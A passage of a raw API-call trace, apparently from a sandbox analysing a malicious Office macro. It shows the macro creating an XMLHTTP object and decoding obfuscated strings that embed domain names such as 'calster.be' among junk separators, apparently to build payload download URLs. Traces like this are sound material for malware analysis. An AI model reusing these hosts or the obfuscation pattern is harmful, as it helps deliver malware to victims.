ppTypeAttr=0x2e4d88, pDummy=0x9e40eb6*=0x0) returned 0x0 [0032.908] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0032.908] IUnknown:Release (This=0xb5b23b8) returned 0x3 [0032.908] IMalloc:Free (This=0x7fefe015380, pv=0x7846630) [0032.908] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e4320, pDummy=0x0 | out: ppTypeAttr=0x2e4320, pDummy=0x0) returned 0x0 [0032.908] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0032.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52f934, cbMultiByte=7, lpWideCharStr=0x9e419ca, cchWideChar=16 | out: lpWideCharStr="Caption") returned 7 [0032.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52f974, cbMultiByte=1, lpWideCharStr=0x9e42f96, cchWideChar=4 | out: lpWideCharStr="G") returned 1 [0032.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52f97a, cbMultiByte=1, lpWideCharStr=0x9e42ffe, cchWideChar=4 | out: lpWideCharStr=0x9e42ffe) returned 1 [0032.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52f980, cbMultiByte=2, lpWideCharStr=0x9e43066, cchWideChar=6 | out: lpWideCharStr="MS") returned 2 [0032.908] IMalloc:Free (This=0x7fefe015380, pv=0x7846630) [0032.908] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4480, pDummy=0x0 | out: ppTypeAttr=0x2e4480, pDummy=0x0) returned 0x0 [0032.908] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0032.908] IMalloc:Free (This=0x7fefe015380, pv=0x7846630) [0032.908] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e46c0, pDummy=0x0 | out: ppTypeAttr=0x2e46c0, pDummy=0x0) returned 0x0 [0032.908] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0032.908] IMalloc:Free (This=0x7fefe015380, pv=0xb5a5eb0) [0032.909] SetErrorMode (uMode=0x8001) returned 0x8005 [0032.909] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0032.909] SetErrorMode (uMode=0x8005) returned 0x8005 [0032.909] GetProcAddress (hModule=0x7fee36e0000, lpProcName=0x2cc) returned 0x7fee3a19158 [0032.910] IUnknown:AddRef (This=0xb5a50d8) returned 0x3 [0032.910] IUnknown:AddRef (This=0xb5a50d8) returned 0x3 [0032.910] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x2e6188 | out: lpclsid=0x2e6188*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0 [0032.914] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0032.914] CoCreateInstance (in: rclsid=0x2e6188*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fee3a6aa48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2e6138 | out: ppv=0x2e6138*=0xaba5aa0) returned 0x0 [0033.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0xaba5aa0, riid=0x7fee3a84590*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x2e6150 | out: ppvObject=0x2e6150*=0x0) returned 0x80004002 [0033.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0xaba5aa0, riid=0x7fee3a845a0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x2e6158 | out: ppvObject=0x2e6158*=0x0) returned 0x80004002 [0033.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0xaba5aa0, riid=0x7fee3a6aa68*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e6218 | out: ppvObject=0x2e6218*=0xaba5aa0) returned 0x0 [0033.004] XMLHTTPRequest:IUnknown:Release (This=0xaba5aa0) returned 0x1 [0033.004] XMLHTTPRequest:IUnknown:AddRef (This=0xaba5aa0) returned 0x2 [0033.004] XMLHTTPRequest:IUnknown:Release (This=0xaba5aa0) returned 0x1 [0033.004] UserForm:IClassFactory:CreateInstance (in: This=0x7fee33e1aa0, pUnkOuter=0x765d308, riid=0x7fee3a6aa48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e5ed0 | out: ppvObject=0x2e5ed0*=0xb5265c0) returned 0x0 [0033.004] IUnknown:AddRef (This=0xb5265c0) returned 0x0 [0033.004] IUnknown:AddRef (This=0xb5265c0) returned 0x0 [0033.004] IUnknown:QueryInterface (in: This=0xb5265c0, riid=0x7fee3a6aa68*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x765d2f0 | out: ppvObject=0x765d2f0*=0xb526648) returned 0x0 [0033.004] strcpy_s (in: _Dst=0x2e5b70, _DstSize=0x114, _Src="VBInternal_Create:" | out: _Dst="VBInternal_Create:") returned 0x0 [0033.004] lstrcpyA (in: lpString1=0x2e5b82, lpString2="RDM" | out: lpString1="RDM") returned="RDM" [0033.004] CExposedDocFile::Stat () returned 0x0 [0033.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93bacdc, cbMultiByte=-1, lpWideCharStr=0x2e5a00, cchWideChar=9 | out: lpWideCharStr="\x03VBFrame") returned 9 [0033.004] CExposedDocFile::OpenStream () returned 0x0 [0033.004] CExposedStream::Stat () returned 0x0 [0033.004] GlobalLock (hMem=0x5000088) returned 0x71576f0 [0033.004] GlobalSize (hMem=0x5000088) returned 0x200 [0033.004] CExposedStream::Read () returned 0x0 [0033.004] lstrcmpiA (lpString1="VERSION", lpString2="VERSION") returned 0 [0033.004] lstrcmpiA (lpString1="Begin", lpString2="Begin") returned 0 [0033.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3aab730, cbMultiByte=-1, lpWideCharStr=0x2e59d0, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0033.004] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x2e5a58 | out: pclsid=0x2e5a58*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0033.004] lstrcpynA (in: lpString1=0x2e5900, lpString2="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", iMaxLength=256 | out: lpString1="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}" [0033.005] lstrcpynA (in: lpString1=0x2e5800, lpString2="RDM", iMaxLength=256 | out: lpString1="RDM") returned="RDM" [0033.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e5900, cbMultiByte=-1, lpWideCharStr=0x2e56d0, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0033.005] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x2e5730 | out: pclsid=0x2e5730*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0033.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", cchWideChar=-1, lpMultiByteStr=0x2e5290, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpUsedDefaultChar=0x0) returned 0 [0033.005] lstrlenA (lpString="RDM") returned 3 [0033.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e5900, cbMultiByte=-1, lpWideCharStr=0x2e5700, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0033.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e5900, cbMultiByte=-1, lpWideCharStr=0x2e5690, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0033.005] lstrcmpiA (lpString1="Begin", lpString2="Caption") returned -1 [0033.005] lstrcmpiA (lpString1="End", lpString2="Caption") returned 1 [0033.005] lstrcpynA (in: lpString1=0x2e5620, lpString2="Caption", iMaxLength=261 | out: lpString1="Caption") returned="Caption" [0033.005] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Caption") returned 0x107810 [0033.005] lstrcmpiA (lpString1="Begin", lpString2="ClientHeight") returned -1 [0033.005] lstrcmpiA (lpString1="End", lpString2="ClientHeight") returned 1 [0033.005] lstrcpynA (in: lpString1=0x2e5620, lpString2="ClientHeight", iMaxLength=261 | out: lpString1="ClientHeight") returned="ClientHeight" [0033.005] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientHeight") returned 0x107da9 [0033.005] lstrcpynA (in: lpString1=0x91e7ea0, lpString2="8130", iMaxLength=261 | out: lpString1="8130") returned="8130" [0033.005] atof (_String="8130") returned 0x93b12f0 [0033.005] lstrcmpiA (lpString1="Begin", lpString2="ClientLeft") returned -1 [0033.005] lstrcmpiA (lpString1="End", lpString2="ClientLeft") returned 1 [0033.005] lstrcpynA (in: lpString1=0x2e5620, lpString2="ClientLeft", iMaxLength=261 | out: lpString1="ClientLeft") returned="ClientLeft" [0033.005] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientLeft") returned 0x104925 [0033.005] lstrcpynA (in: lpString1=0x91e7ea0, lpString2="120", iMaxLength=261 | out: lpString1="120") returned="120" [0033.005] atof (_String="120") returned 0x93b12f0 [0033.006] lstrcmpiA (lpString1="Begin", lpString2="ClientTop") returned -1 [0033.006] lstrcmpiA (lpString1="End", lpString2="ClientTop") returned 1 [0033.006] lstrcpynA (in: lpString1=0x2e5620, lpString2="ClientTop", iMaxLength=261 | out: lpString1="ClientTop") returned="ClientTop" [0033.006] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientTop") returned 0x109869 [0033.006] lstrcpynA (in: lpString1=0x91e7ea0, lpString2="450", iMaxLength=261 | out: lpString1="450") returned="450" [0033.006] atof (_String="450") returned 0x93b12f0 [0033.006] lstrcmpiA (lpString1="Begin", lpString2="ClientWidth") returned -1 [0033.006] lstrcmpiA (lpString1="End", lpString2="ClientWidth") returned 1 [0033.006] lstrcpynA (in: lpString1=0x2e5620, lpString2="ClientWidth", iMaxLength=261 | out: lpString1="ClientWidth") returned="ClientWidth" [0033.006] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientWidth") returned 0x1028e4 [0033.006] lstrcpynA (in: lpString1=0x91e7ea0, lpString2="9915", iMaxLength=261 | out: lpString1="9915") returned="9915" [0033.006] atof (_String="9915") returned 0x93b12f0 [0033.006] lstrcmpiA (lpString1="Begin", lpString2="StartUpPosition") returned -1 [0033.006] lstrcmpiA (lpString1="End", lpString2="StartUpPosition") returned -1 [0033.006] lstrcpynA (in: lpString1=0x2e5620, lpString2="StartUpPosition", iMaxLength=261 | out: lpString1="StartUpPosition") returned="StartUpPosition" [0033.006] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="StartUpPosition") returned 0x10fb67 [0033.006] lstrcpynA (in: lpString1=0x91e7ea0, lpString2="1", iMaxLength=261 | out: lpString1="1") returned="1" [0033.006] lstrcmpiA (lpString1="Begin", lpString2="TypeInfoVer") returned -1 [0033.006] lstrcmpiA (lpString1="End", lpString2="TypeInfoVer") returned -1 [0033.006] lstrcpynA (in: lpString1=0x2e5620, lpString2="TypeInfoVer", iMaxLength=261 | out: lpString1="TypeInfoVer") returned="TypeInfoVer" [0033.006] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="TypeInfoVer") returned 0x107334 [0033.006] lstrcpynA (in: lpString1=0x91e7ea0, lpString2="35", iMaxLength=261 | out: lpString1="35") returned="35" [0033.006] lstrcmpiA (lpString1="Begin", lpString2="End") returned -1 [0033.006] lstrcmpiA (lpString1="End", lpString2="End") returned 0 [0033.006] MonitorFromWindow (hwnd=0x10222, dwFlags=0x2) returned 0x10001 [0033.006] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x2e5400 | out: lpmi=0x2e5400) returned 1 [0033.007] lstrcmpiA (lpString1="Begin", lpString2="End") returned -1 [0033.008] IUnknown:AddRef (This=0xb5265c0) returned 0x0 [0033.008] IUnknown:Release (This=0xb5265c0) returned 0x0 [0033.008] CExposedDocFile::AddRef () returned 0x4 [0033.008] CExposedDocFile::AddRef () returned 0x3 [0033.008] CExposedDocFile::OpenStream () returned 0x0 [0033.008] CExposedStream::AddRef () returned 0x2 [0033.008] CExposedStream::Release () returned 0x1 [0033.009] CExposedStream::Seek () returned 0x0 [0033.009] CExposedDocFile::OpenStream () returned 0x0 [0033.009] CExposedStream::AddRef () returned 0x2 [0033.009] CExposedStream::Release () returned 0x1 [0033.009] CExposedStream::Seek () returned 0x0 [0033.009] CExposedStream::Seek () returned 0x0 [0033.012] CExposedStream::Seek () returned 0x0 [0033.012] CExposedStream::Release () returned 0x0 [0033.012] CExposedStream::Release () returned 0x0 [0033.013] IUnknown:QueryInterface (in: This=0xb5265c0, riid=0x7fee3a6aa68*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e5a50 | out: ppvObject=0x2e5a50*=0xb526648) returned 0x0 [0033.013] IUnknown:QueryInterface (in: This=0xb5265c0, riid=0x7fee3a6aa68*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e5a50 | out: ppvObject=0x2e5a50*=0xb526648) returned 0x0 [0033.014] GetWindowLongA (hWnd=0x20252, nIndex=-20) returned 262401 [0033.014] SetWindowLongA (hWnd=0x20252, nIndex=-20, dwNewLong=262401) returned 262401 [0033.015] CExposedStream::Commit () returned 0x0 [0033.015] CExposedStream::Release () returned 0x0 [0033.015] GlobalHandle (pMem=0x71576f0) returned 0x5000088 [0033.015] GlobalUnlock (hMem=0x5000088) returned 0 [0033.015] IUnknown:AddRef (This=0xb5265c0) returned 0x0 [0033.015] IUnknown:QueryInterface (in: This=0xb5265c0, riid=0x7fee3a7b128*(Data1=0x468cfb80, Data2=0xb4f9, Data3=0x11cf, Data4=([0]=0x80, [1]=0xdd, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x61, [6]=0x48, [7]=0x95)), ppvObject=0x2e5e00 | out: ppvObject=0x2e5e00*=0x2dda710) returned 0x0 [0033.015] IUnknown:Release (This=0xb5265c0) returned 0x0 [0033.017] IUnknown:QueryInterface (in: This=0xb5265c0, riid=0x7fee3a6a850*(Data1=0xf27be360, Data2=0x1b98, Data3=0x11cf, Data4=([0]=0x84, [1]=0xfc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa7, [6]=0x1d, [7]=0xcb)), ppvObject=0x2e5e48 | out: ppvObject=0x2e5e48*=0x0) returned 0x80004002 [0033.017] IUnknown:Release (This=0xb5265c0) returned 0x0 [0033.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb5140ec, cbMultiByte=0, lpWideCharStr=0x9e4049c, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0033.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52fa24, cbMultiByte=60, lpWideCharStr=0x9e40c1a, cchWideChar=122 | out: lpWideCharStr="calster.be}87wifhFsdfCHAS74jhdrFRAPSmdtyis.net}af}87wifhFsdf") returned 60 [0033.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52fa64, cbMultiByte=5, lpWideCharStr=0x9e40cf8, cchWideChar=12 | out: lpWideCharStr="FRAPS") returned 5 [0033.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52fa6e, cbMultiByte=2, lpWideCharStr=0x9e40d68, cchWideChar=6 | out: lpWideCharStr="om") returned 2 [0033.017] ITypeInfo:GetRefTypeInfo (in: This=0x784ce98, hreftype=0x480, ppTInfo=0x2e4598 | out: ppTInfo=0x2e4598*=0x784cef0) returned 0x0 [0033.017] IUnknown:QueryInterface (in: This=0x784cef0, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4768 | out: ppvObject=0x2e4768*=0x0) returned 0x80004002 [0033.017] ITypeInfo:RemoteGetTypeAttr (in: This=0x784cef0, ppTypeAttr=0x2e45e8, pDummy=0x10 | out: ppTypeAttr=0x2e45e8, pDummy=0x10) returned 0x0 [0033.017] ITypeInfo:LocalReleaseTypeAttr (This=0x784cef0) returned 0x0 [0033.017] IUnknown:Release (This=0x784cef0) returned 0x1 [0033.017] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a76b50*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e4600 | out: ppvObject=0x2e4600*=0x784ce98) returned 0x0 [0033.017] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x784ce98, memid=1610612785, invkind=1, pFuncIndex=0x2e45f8 | out: pFuncIndex=0x2e45f8*=0x31) returned 0x0 [0033.018] ITypeInfo2:GetParamCustData (in: This=0x784ce98, indexFunc=0x31, indexParam=0x3, GUID=0x7fee3a84fb8*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x2e4608 | out: pVarVal=0x2e4608*(varType=0x0, wReserved1=0xb51, wReserved2=0x0, wReserved3=0x0, varVal1=0xb529780, varVal2=0x2e5318)) returned 0x0 [0033.018] IUnknown:Release (This=0x784ce98) returned 0x3 [0033.018] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a76b50*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e4600 | out: ppvObject=0x2e4600*=0x784ce98) returned 0x0 [0033.018] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x784ce98, memid=1610612785, invkind=1, pFuncIndex=0x2e45f8 | out: pFuncIndex=0x2e45f8*=0x31) returned 0x0 [0033.018] ITypeInfo2:GetParamCustData (in: This=0x784ce98, indexFunc=0x31, indexParam=0x4, GUID=0x7fee3a84fb8*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x2e4608 | out: pVarVal=0x2e4608*(varType=0x0, wReserved1=0xb51, wReserved2=0x0, wReserved3=0x0, varVal1=0xb529780, varVal2=0x2e5318)) returned 0x0 [0033.018] IUnknown:Release (This=0x784ce98) returned 0x3 [0033.018] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a76b50*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2e4600 | out: ppvObject=0x2e4600*=0x784ce98) returned 0x0 [0033.018] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x784ce98, memid=1610612785, invkind=1, pFuncIndex=0x2e45f8 | out: pFuncIndex=0x2e45f8*=0x31) returned 0x0 [0033.018] ITypeInfo2:GetParamCustData (in: This=0x784ce98, indexFunc=0x31, indexParam=0x5, GUID=0x7fee3a84fb8*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x2e4608 | out: pVarVal=0x2e4608*(varType=0x3, wReserved1=0x763, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x2e5318)) returned 0x0 [0033.018] IUnknown:Release (This=0x784ce98) returned 0x3 [0033.018] IUnknown:AddRef (This=0x784cef0) returned 0x2 [0033.018] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4910 | out: ppvObject=0x2e4910*=0x0) returned 0x80004002 [0033.018] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e48e0 | out: ppvObject=0x2e48e0*=0x0) returned 0x80004002 [0033.018] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e48d0 | out: ppvObject=0x2e48d0*=0x0) returned 0x80004002 [0033.018] IUnknown:QueryInterface (in: This=0x784ce98, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e48d8 | out: ppvObject=0x2e48d8*=0x0) returned 0x80004002 [0033.018] ITypeInfo:RemoteGetTypeAttr (in: This=0x784ce98, ppTypeAttr=0x2e4908, pDummy=0x10 | out: ppTypeAttr=0x2e4908, pDummy=0x10) returned 0x0 [0033.018] ITypeInfo:LocalReleaseTypeAttr (This=0x784ce98) returned 0x0 [0033.018] IUnknown:AddRef (This=0x784ce98) returned 0x5 [0033.018] IMalloc:Free (This=0x7fefe015380, pv=0x7846630) [0033.018] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shtefin") returned 0x1095a3 [0033.018] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x8, _Src="Shtefin" | out: _Dst="Shtefin") returned 0x0 [0033.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=8, lpWideCharStr=0x2e4650, cchWideChar=8 | out: lpWideCharStr="Shtefin") returned 8 [0033.018] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.018] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Shtefin", lHashVal=0x1095a3, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.019] IUnknown:Release (This=0x782a220) returned 0xe [0033.019] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.019] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Shtefin", lHashVal=0x1095a3, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.019] IUnknown:Release (This=0x731da90) returned 0x15 [0033.019] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.019] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Shtefin", lHashVal=0x1095a3, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.019] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.019] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.019] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Shtefin", lHashVal=0x1095a3, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.019] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.019] IMalloc:Alloc (This=0x7fefe015380, cb=0xf) returned 0xb495a70 [0033.019] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Shtefin") returned 0x109927 [0033.019] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xf, _Src="_B_var_Shtefin" | out: _Dst="_B_var_Shtefin") returned 0x0 [0033.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=15, lpWideCharStr=0x2e4800, cchWideChar=15 | out: lpWideCharStr="_B_var_Shtefin") returned 15 [0033.019] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.019] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Shtefin", lHashVal=0x109927, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.019] IUnknown:Release (This=0x782a220) returned 0xe [0033.019] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.019] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Shtefin", lHashVal=0x109927, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.019] IUnknown:Release (This=0x731da90) returned 0x15 [0033.019] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.019] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_Shtefin", lHashVal=0x109927, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.019] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.019] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.019] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_Shtefin", lHashVal=0x109927, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.019] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.019] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.019] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_Shtefin", lHashVal=0x109927, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.019] IUnknown:Release (This=0x782b300) returned 0x6 [0033.019] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.019] IUnknown:Release (This=0x782a220) returned 0xe [0033.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52fa88, cbMultiByte=1, lpWideCharStr=0x9e4148a, cchWideChar=4 | out: lpWideCharStr="}") returned 1 [0033.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52fa8e, cbMultiByte=1, lpWideCharStr=0x9e414f2, cchWideChar=4 | out: lpWideCharStr="/") returned 1 [0033.019] IUnknown:AddRef (This=0xb5a5078) returned 0x5 [0033.019] ITypeInfo:GetRefTypeOfImplType (in: This=0xb5a5078, index=0xffffffff, pRefType=0x2e4750 | out: pRefType=0x2e4750*=0xfffffffe) returned 0x0 [0033.019] 